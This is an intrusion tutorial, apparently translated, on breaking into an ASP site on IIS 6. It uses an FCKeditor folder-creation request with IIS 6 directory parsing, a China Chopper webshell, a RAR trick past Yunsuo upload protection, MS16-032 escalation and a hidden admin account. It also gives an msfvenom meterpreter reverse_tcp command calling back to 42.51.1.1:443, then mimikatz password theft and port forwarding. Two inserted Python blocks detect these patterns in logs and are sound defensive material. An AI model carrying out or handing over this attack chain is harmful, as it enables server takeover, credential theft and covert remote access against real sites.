This article was written by: Cool Prince Handsome
1. Getting a webshell
First, scan the target site. It is an ASP site, so I scanned directly for the admin backend and the default database, downloaded the database and decrypted the admin login.
After logging in to the backend I found FCKeditor, and the server is still running IIS 6.0, so creating an .asp directory to trigger the IIS 6 parsing behaviour is an option (the FCKeditor path had been changed to something else; you can see the real path when you capture the request with Burp Suite).
Below we construct an .asp directory, for example:
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?command=createfolder&type=image&currentfolder=%2fshell.asp&newfoldername=z&uuid=1244789975
Then upload an image in JPG format into the shell.asp directory and open it with China Chopper. Next I checked that ASPX is supported, so I used the include method: rename the ASPX file's extension to .rar, then create a 111.aspx that includes the .rar file. Looking at the process list I saw both Yunsuo (cloud lock) and Safedog, so let's take it slow from here.
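As an added defender-side example (not part of the original article), the following Python scans constructed IIS W3C-style log lines for the two things the walkthrough above relies on: FCKeditor connector requests that create a folder, or upload into one, whose name carries a classic ASP extension, and any request path in which a directory component ends in .asp, .asa, .cer or .cdx (IIS 6 hands everything under such a directory to the ASP engine). It also flags the related "name.asp;.jpg" file-name form, which goes slightly beyond the createfolder case in the text. The log lines, client IPs and the /userfiles paths are constructed; only the connector path is taken from the article.

```python
"""Flag IIS 6 log entries consistent with FCKeditor createfolder abuse and
the IIS 6 'ASP-named directory' parsing behaviour.  Educational detection
example with constructed log lines; not code from the original article."""
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote

# Extensions that classic ASP on IIS 6 executes.  A *directory* carrying one of
# these names makes IIS 6 run any file below it (even a .jpg) as ASP.
ASP_EXTS = (".asp", ".asa", ".cer", ".cdx")

# Constructed W3C-style lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2017-03-01 10:01:02 203.0.113.7 GET /manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp command=createfolder&type=image&currentfolder=%2fshell.asp&newfoldername=z 200
2017-03-01 10:01:30 203.0.113.7 POST /manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp command=fileupload&type=image&currentfolder=%2fshell.asp%2fz%2f 200
2017-03-01 10:02:11 203.0.113.7 POST /userfiles/image/shell.asp/z/1.jpg - 200
2017-03-01 10:03:05 198.51.100.9 GET /userfiles/image/logo.jpg - 200
2017-03-01 10:03:40 203.0.113.7 GET /userfiles/image/x.asp;.jpg - 200
2017-03-01 10:04:00 198.51.100.9 GET /manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp command=createfolder&type=image&currentfolder=%2f&newfoldername=photos 200
"""


def suspicious_folder(folder: str) -> bool:
    """Every segment of a connector folder path is a directory, so any
    ASP-named segment (currentfolder=/shell.asp, newfoldername=z.asp) is bad."""
    segs = [s for s in unquote(folder).lower().split("/") if s]
    return any(s.endswith(ASP_EXTS) for s in segs)


def suspicious_uri(stem: str) -> bool:
    """Request path with an ASP-named directory component, or a file name
    using the 'x.asp;.jpg' form that IIS 6 truncates at the semicolon."""
    parts = [p for p in unquote(stem).lower().split("/") if p]
    if not parts:
        return False
    *dirs, leaf = parts
    return any(d.endswith(ASP_EXTS) for d in dirs) or any(e + ";" in leaf for e in ASP_EXTS)


def classify(line: str) -> Optional[str]:
    """Return a rule tag for one log line, or None when it looks benign."""
    fields = line.split()
    if len(fields) < 7:
        return None
    _date, _time, _ip, _method, stem, query, _status = fields[:7]
    params = {}
    if query != "-":
        params = {k.lower(): v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    if "/filemanager/connectors/" in stem.lower():
        cmd = params.get("command", "").lower()
        target = params.get("currentfolder", "") + "/" + params.get("newfoldername", "")
        if cmd in ("createfolder", "fileupload") and suspicious_folder(target):
            return f"fckeditor-{cmd}-asp-dir"
    if suspicious_uri(stem):
        return "asp-dir-parsing"
    return None


def scan(log: str) -> List[Tuple[str, str, str]]:
    """(client ip, uri stem, rule) for every flagged line; '#' header lines skipped."""
    hits = []
    for line in log.splitlines():
        if not line or line.startswith("#"):
            continue
        tag = classify(line)
        if tag:
            f = line.split()
            hits.append((f[2], f[4], tag))
    return hits


if __name__ == "__main__":
    for ip, stem, rule in scan(SAMPLE_LOG):
        print(f"{rule:32} {ip:15} {stem}")
```

The second rule is the one worth alerting on regardless of editor: on IIS 6 a legitimate site almost never serves content from a directory whose name ends in .asp, so a single hit is high-signal. The createfolder rule catches the attempt even when the upload itself fails.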
2. Bypassing Safedog and Yunsuo and adding an account
I couldn't see the system information, but from the site's 404 page it can be determined to be Windows Server 2003, and since C:\Program Files (x86) exists it is the 64-bit version of 2003. So let's go: upload the 64-bit MS16-032 exploit directly. But an uploaded exe (or an exp in any other format) disappeared automatically. Looking at the process list there was no antivirus, so this is Yunsuo's file-defense feature. The way to get past Yunsuo's upload protection is RAR: pack the exp as 64.rar, upload it, then unpack the RAR into a directory under C:\Program Files (x86) and run it.
Running it gives SYSTEM directly. Then I used the Safedog-killing tool to add an account and used Tunna to forward port 3968, but it said the account was not in the Remote Desktop group. I also wanted to use GetPassword64 to grab the plaintext password, but it hung as soon as it ran, so I could only think of Metasploit.
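As an added detection-side example (editor's code, not from the original article), the following Python correlates a handful of constructed Windows Security events to surface the post-exploitation pattern described above: a process spawned from the IIS worker, then a freshly created local account placed in Administrators or Remote Desktop Users within a short window. The event IDs are real (4688 process creation, 4720 account created, 4732 member added to a local group); the flattened dict layout, timestamps, account names and the `parent` field are assumptions. Note that the parent ("Creator Process Name") field in 4688 only exists on newer Windows versions; on Server 2003 you would have to resolve the Creator Process ID against earlier 4688 events.

```python
"""Correlate constructed Windows Security events: web-worker-spawned processes
and new accounts that land in a privileged group.  Educational example added
by the editor; the events below are constructed, not real log data."""
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed events.  Real IDs: 4688 process creation, 4720 account created,
# 4732 member added to a security-enabled local group.
EVENTS: List[Dict[str, object]] = [
    {"id": 4688, "time": "2017-03-01 10:10:00", "subject": "NETWORK SERVICE",
     "new_process": r"C:\Program Files (x86)\64.exe",
     "parent": r"C:\WINDOWS\system32\inetsrv\w3wp.exe"},
    {"id": 4720, "time": "2017-03-01 10:11:05", "subject": "SYSTEM", "target": "svc_backup"},
    {"id": 4732, "time": "2017-03-01 10:11:07", "subject": "SYSTEM",
     "group": "Administrators", "member": "svc_backup"},
    {"id": 4732, "time": "2017-03-01 10:11:09", "subject": "SYSTEM",
     "group": "Remote Desktop Users", "member": "svc_backup"},
    # A normal help-desk account creation for contrast: not flagged.
    {"id": 4720, "time": "2017-03-01 14:00:00", "subject": "admin_jane", "target": "intern01"},
    {"id": 4732, "time": "2017-03-01 14:00:30", "subject": "admin_jane",
     "group": "Users", "member": "intern01"},
]

WEB_WORKERS = ("w3wp.exe", "inetinfo.exe")          # IIS 6 worker / legacy host
PRIV_GROUPS = {"administrators", "remote desktop users"}
WINDOW = timedelta(minutes=10)                        # create-then-elevate window


def _ts(event: Dict[str, object]) -> datetime:
    return datetime.strptime(str(event["time"]), "%Y-%m-%d %H:%M:%S")


def web_spawned_processes(events: List[Dict[str, object]]) -> List[str]:
    """4688 events whose parent is an IIS worker: commands run through a web shell."""
    return [str(e["new_process"]) for e in events
            if e["id"] == 4688 and str(e["parent"]).lower().endswith(WEB_WORKERS)]


def new_privileged_accounts(events: List[Dict[str, object]]) -> List[Tuple[str, str]]:
    """Accounts created (4720) and added to a privileged group (4732) within WINDOW."""
    created = {str(e["target"]).lower(): _ts(e) for e in events if e["id"] == 4720}
    hits: List[Tuple[str, str]] = []
    for e in events:
        if e["id"] != 4732 or str(e["group"]).lower() not in PRIV_GROUPS:
            continue
        member = str(e["member"]).lower()
        if member in created and timedelta(0) <= _ts(e) - created[member] <= WINDOW:
            hits.append((str(e["member"]), str(e["group"])))
    return hits


if __name__ == "__main__":
    for proc in web_spawned_processes(EVENTS):
        print("process spawned by web worker:", proc)
    for member, group in new_privileged_accounts(EVENTS):
        print(f"new account {member} added to {group}")
```

Either signal alone is worth a look; the two together in the same ten minutes on a web server are close to a confirmed compromise, and they fire even when the attacker's own tooling is deleted afterwards, because they live in the Security log rather than on disk.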
3. Using Metasploit
First, use PentestBox to generate a 64-bit payload with the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > C:\mata.exe
Why port 443? When I tested with other ports earlier they were blocked by the firewall and the session never came online. Next we run this mata.exe under SYSTEM and the session comes online.
Next we grab the plaintext password with these two commands. Command 1: use mimikatz. Command 2: kerberos. For example:
Then set up the port forward with the following command:
portfwd add -l 6655 -p 3968 -r 127.0.0.1. This command forwards the target server's remote port 3968 to port 6655 on the public-IP PentestBox.
No problem, bro. Thank you for watching my tutorial, thank you very much ~
From getting a webshell, to bypassing Safedog and Yunsuo, to using Metasploit to get into the server